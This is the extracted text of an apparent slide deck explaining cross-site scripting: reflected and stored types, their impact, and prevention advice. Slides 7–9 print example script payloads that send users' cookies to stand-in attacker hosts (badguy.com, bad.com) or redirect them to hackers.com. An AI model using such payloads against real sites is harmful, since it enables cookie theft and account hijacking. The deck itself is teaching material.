Cross-site scripting (XSS) vulnerabilities explained
âąAls PPTX, PDF herunterladenâą
1 gefĂ€llt mirâą933 views
Empfohlen
Weitere Àhnliche Inhalte
Was ist angesagt?
Was ist angesagt? (20)
Andere mochten auch
Andere mochten auch (9)
Ăhnlich wie Cross-site scripting (XSS) vulnerabilities explained
Ăhnlich wie Cross-site scripting (XSS) vulnerabilities explained (20)
KĂŒrzlich hochgeladen
KĂŒrzlich hochgeladen (20)
Cross-site scripting (XSS) vulnerabilities explained
- 2. OVERVIEW ï¶ CROSS-SITE SCRIPTING ï¶ XSS (-ve) effects ï¶ Cross Site Scripting Types ï¶ Who is affected by XSS? ï¶ Impact of XSS-Attacks ï¶ Summary 12/15/2013 2
- 3. CROSS-SITE SCRIPTING (XSS) ïĄ Cross-site scripting or XSS is a defined as a computer security vulnerability (weakness) found in web applications. ïĄ XSS allows for code injection by malicious web users into Internet pages viewed by other users. ïĄ In an XSS attack, the attacker gains the ability to see private user IDs, passwords, credit card information and other personal identification. 12/15/2013 3
- 4. XSS (-ve) effects stealing other userâs cookies ïĄ stealing their private information ïĄ performing actions on behalf of other users ïĄ redirecting to other websites ïĄ Showing ads in hidden IFRAMES and popups ïĄ 12/15/2013 4
- 5. Cross Site Scripting Types Two known types: ï§ Reflected (Non-Persistent) âą Link in other website or email ï§ 12/15/2013 Stored (Persistent) âą Forum, bulletin board, feedback form 5
- 6. Reflected (Non-persistent)⊠The Reflected Cross-Site Scripting vulnerability is by far the most common and well-known type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If all occurrences of the search terms are not HTML entity encoded, an XSS hole will result. 12/15/2013 6
- 7. 1 Send e-mail with <script> tags embedded in the link. http://mybank.com/ account.php?variable=â><script>document.lo cation=âhttp://www.badguy.com/cgi-bin/ cookie.cgiââ%20+document.cookie</script> Follows link and the script executes 2 www.badguy.com Cookie collector ï§Malicious content dose not get stored in the server ï§The server bounces the original input to the victim without modification 12/15/2013 7
- 8. stored (persistent)âŠ. In persistent type of XSS attack, XSS code gets saved into persistent storage like database with other data and then it is visible to other users also. One example of this kind of attacks is possible blog websites, where hacker can add their XSS code along with the comment text and if no validation or filtering is present on the server, XSS code can successfully saved into the database. After this if anyone (other users) open the page into their browsers, XSS code can execute and can perform a variety of harmful actions. This type of attack is more vulnerable, because Hacker can steal cookies and can make modifications in the page. The risk with these kinds of attacks is any third party hacker can use this vulnerability to perform some actions on behalf of other users. see original post<script>window.location = "http://www.hackers.com?yid=";</script> 12/15/2013 8
- 9. Public forum web site 1 Great message! <script> var img=new Image(); img.src= "http://www.bad.com/CookieStealer/ Form1.aspx?s= "+document.cookie; </script> 2 Downlaod malicious code Upload malicious scripting commands to the public forum Browse Attacker 3 Victim ï§The server stores the malicious content ï§The server serves the malicious content in its original form 12/15/2013 9
- 10. Who is affected by XSS? ï± XSS attackâs first target is the Client Client trusts server (Does not expect attack) Browser executes malicious script ï± But second target = Company running the Server Loss of public image (Blame) Loss of customer trust Loss of money 12/15/2013 10
- 11. Impact of XSS-Attacks Access to authentication credentials for Web application ï± Cookies, Username and Password ï± Normal users ïAccess to personal data (Credit card, Bank Account) ïAccess to business data (Bid details, construction details) ïMisuse account (order expensive goods) ï± High privileged users ïControl over Web application ïControl/Access: Web server machine ïControl/Access: Backend / Database systems 12/15/2013 11
- 12. ï¶ Clint side âąCookie Security âąVerify email âąAlways update ï¶ Server side âąInput validation (Black listing VS White listing) âąEncode all meta characters send to the client âąkeep track of user sessions âąWeb application firewall âąAlways test 12/15/2013 12
- 13. Summary ï¶ Cross-Site Scripting is extremly dangerous ï§ Identity theft, Impersonation ï¶ Cause: Missing or in-sufficient input validation ï¶ XSS-Prevention Best Practices ï§ Implement XSS-Prevention in application ï§ Do not trust client side validation ï§ Check and validate all input before processing ï§ Do not echo any input value without validation 12/15/2013 13
- 14. ïĄ ïĄ ïĄ ïĄ http://www.acunetix.com http://en.wikipedia.org/wiki/Crosssite_scriptinghttp://www.google.com http://www.google.com XSS Attacks: Cross Site Scripting Exploits and Defense :-Seth Fogie (Author), Jeremiah Grossman (Author)
- 15. 12/15/2013 15